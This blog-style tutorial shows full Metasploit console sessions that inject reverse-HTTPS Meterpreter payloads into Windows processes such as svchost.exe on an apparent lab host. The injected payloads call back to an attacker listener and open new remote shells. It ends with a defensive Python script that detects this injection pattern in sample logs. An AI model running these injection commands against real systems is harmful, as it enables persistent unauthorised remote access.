Metasploit: injecting a payload
Posted on 2012-10-3 20:09:21
Metasploit's shell backdoor can get interrupted in some situations, especially during DLL injection and VNC GUI access.
Here we can use payload_inject to inject another backdoor. First, look at the module info:
  msf  exploit(ms08_067_netapi) > sessions -i 9
  [*] Starting interaction with 9...

  meterpreter > info post/windows/manage/payload_inject

         Name: Windows Manage Memory Payload Injection Module
       Module: post/windows/manage/payload_inject
      Version: 14190
     Platform: Windows
         Arch:
         Rank: Normal

  Provided by:
    Carlos Perez <carlos_perez@darkoperator.com>

  Description:
    This module will inject into the memory of a process a specified
    windows payload. If a payload or process is not provided one will be
    created by default using a reverse x86 TCP Meterpreter Payload.

  Module options (post/windows/manage/payload_inject):

     Name     Current Setting                  Required  Description
     ----     ---------------                  --------  -----------
     HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
     LHOST                                     yes       IP of host that will receive the connection from the payload.
     LPORT    4433                             no        Port for Payload to connect to.
     OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
     PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
     PID                                       no        Process Identifier to inject of process to inject payload.
     SESSION                                   yes       The session to run this module on.

  meterpreter >

Now let's try injecting an HTTPS backdoor:
  meterpreter > run post/windows/manage/payload_inject PAYLOAD=windows/meterpreter/reverse_https,LHOST=192.1.1.100,LPORT=4114

  [*] Running module against DIS9TEAM-TESTIN
  [*] Performing Architecture Check
  [*] Process found checking Architecture
  [+] Process is the same architecture as the payload
  [*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 356
  [*] Opening process 356
  [*] Generating payload
  [*] Allocating memory in procees 356
  [*] Allocated memory at address 0x00780000, for 367 byte stager
  [*] Writing the stager into memory...
  [+] Successfully injected payload in to process: 356
  meterpreter >

It worked. Of course we can also specify the process to inject into, and so on. First list the processes:
  meterpreter > ps

  Process list
  ============

  PID   Name              Arch  Session  User                          Path
  ---   ----              ----  -------  ----                          ----
  0     [System Process]
  1036  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
  1152  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
  1396  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
  1448  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
  1500  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
  1792  wscntfy.exe       x86   0        DIS9TEAM-TESTIN\dis9team      C:\WINDOWS\system32\wscntfy.exe
  1920  VBoxTray.exe      x86   0        DIS9TEAM-TESTIN\dis9team      C:\WINDOWS\system32\VBoxTray.exe
  1944  ctfmon.exe        x86   0        DIS9TEAM-TESTIN\dis9team      C:\WINDOWS\system32\ctfmon.exe
  1996  explorer.exe      x86   0        DIS9TEAM-TESTIN\dis9team      C:\WINDOWS\Explorer.EXE
  228   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
  4     System            x86   0        NT AUTHORITY\SYSTEM
  408   smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
  500   alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
  532   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
  560   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
  776   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
  788   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
  984   VBoxService.exe   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\VBoxService.exe

  meterpreter >

Inject into PID 1500, svchost.exe (x86, session 0, NT AUTHORITY\LOCAL SERVICE, C:\WINDOWS\system32\svchost.exe):
  meterpreter > run post/windows/manage/payload_inject PAYLOAD=windows/meterpreter/reverse_https,LHOST=192.1.1.100,LPORT=4444,OPTIONS='SessionCommunicationTimeout=0,SessionExpirationTimeout=0,PID=1500'

  [*] Running module against DIS9TEAM-TESTIN
  [*] Performing Architecture Check
  [*] Process found checking Architecture
  [+] Process is the same architecture as the payload
  [*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1500
  [*] Opening process 1500
  [*] Generating payload
  [*] Allocating memory in procees 1500
  [*] Allocated memory at address 0x00a90000, for 367 byte stager
  [*] Writing the stager into memory...
  [+] Successfully injected payload in to process: 1500

  [*] 192.1.1.1:1172 Request received for /INITM...
  [*] 192.1.1.1:1172 Staging connection for target /INITM received...
  [*] Patched transport at offset 486516...
  [*] Patched URL at offset 486248...
  [*] Patched Expiration Timeout at offset 641856...
  [*] Patched Communication Timeout at offset 641860...
  [*] Meterpreter session 12 opened (192.1.1.100:4444 -> 192.1.1.1:1172) at 2011-12-21 17:11:24 +0800

  meterpreter >

Background the session and check the session list:
  meterpreter > background
  msf  exploit(ms08_067_netapi) > sessions

  Active sessions
  ===============

    Id  Type                   Information                                   Connection
    --  ----                   -----------                                   ----------
    10  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-TESTIN         192.1.1.100:4444 -> 192.1.1.1:1055
    11  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-TESTIN         192.1.1.100:4444 -> 192.1.1.1:1110
    12  meterpreter x86/win32  NT AUTHORITY\LOCAL SERVICE @ DIS9TEAM-TESTIN  192.1.1.100:4444 -> 192.1.1.1:1172
    9   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-TESTIN         192.1.1.100:4444 -> 192.1.1.1:1037

  msf  exploit(ms08_067_netapi) >




Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a blade.
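A defender-side companion to the session above: an added detection example (not from the original post and not Metasploit code) that scans constructed endpoint log lines for the trace this module leaves on the target, a full-access handle and a remote thread into svchost.exe PID 1500, followed by that LOCAL SERVICE process calling back to 192.1.1.100:4444. The key=value log format, the injecting process (Explorer.EXE) and the port allowlist are assumptions, not values from the post.

```python
import re

# Constructed sample events modelled on the session above (svchost.exe PID 1500 under
# LOCAL SERVICE calling back to 192.1.1.100:4444). Simplified key=value lines, not real
# Sysmon output; the injecting process (Explorer.EXE) is an assumption.
SAMPLE_LOG = """\
event=ProcessAccess src_pid=1996 src_image=C:\\WINDOWS\\Explorer.EXE dst_pid=1500 dst_image=C:\\WINDOWS\\system32\\svchost.exe access=0x1F0FFF
event=CreateRemoteThread src_pid=1996 src_image=C:\\WINDOWS\\Explorer.EXE dst_pid=1500 dst_image=C:\\WINDOWS\\system32\\svchost.exe start_address=0x00A90000
event=NetworkConnect pid=1500 image=C:\\WINDOWS\\system32\\svchost.exe user=NT AUTHORITY\\LOCAL SERVICE dst_ip=192.1.1.100 dst_port=4444
event=NetworkConnect pid=1152 image=C:\\WINDOWS\\system32\\svchost.exe user=NT AUTHORITY\\NETWORK SERVICE dst_ip=10.0.0.5 dst_port=443
event=NetworkConnect pid=1996 image=C:\\WINDOWS\\Explorer.EXE user=DIS9TEAM-TESTIN\\dis9team dst_ip=10.0.0.9 dst_port=80
"""

FIELD = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")  # values may contain spaces (user names)
EXPECTED_PORTS = {53, 80, 135, 443, 445}          # assumed allowlist for service-account traffic
PROCESS_ALL_ACCESS = 0x1F0FFF                     # what an injector needs to alloc/write/start a thread

def parse(log):
    """Turn each non-empty line into a dict of fields."""
    return [dict(FIELD.findall(line)) for line in log.splitlines() if line.strip()]

def detect(events):
    """Return (severity, message) alerts. Full-access handles and cross-process thread
    creation are flagged on their own; a process that was injected into and then connects
    out is escalated to 'high', and service-account traffic to odd ports is 'medium'."""
    injected = {}   # dst_pid -> image of the process that created a thread in it
    alerts = []
    for e in events:
        kind = e.get("event")
        if kind == "ProcessAccess" and (int(e["access"], 16) & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
            alerts.append(("medium", f"{e['src_image']} opened PID {e['dst_pid']} with PROCESS_ALL_ACCESS"))
        elif kind == "CreateRemoteThread" and e["src_pid"] != e["dst_pid"]:
            injected[e["dst_pid"]] = e["src_image"]
            alerts.append(("medium", f"{e['src_image']} created a thread in PID {e['dst_pid']} at {e['start_address']}"))
        elif kind == "NetworkConnect":
            port = int(e["dst_port"])
            service_acct = e["user"].upper().startswith("NT AUTHORITY\\")
            if e["pid"] in injected:
                alerts.append(("high", f"PID {e['pid']} ({e['image']}) connected to {e['dst_ip']}:{port} after thread injection from {injected[e['pid']]}"))
            elif service_acct and port not in EXPECTED_PORTS:
                alerts.append(("medium", f"service process {e['image']} as {e['user']} connected to {e['dst_ip']}:{port}"))
    return alerts

if __name__ == "__main__":
    for sev, msg in detect(parse(SAMPLE_LOG)):
        print(sev.upper(), msg)
```

The correlation step matters: a lone svchost.exe connection to 443 from NETWORK SERVICE is normal and stays quiet, while the same image connecting out right after receiving a remote thread is the signal.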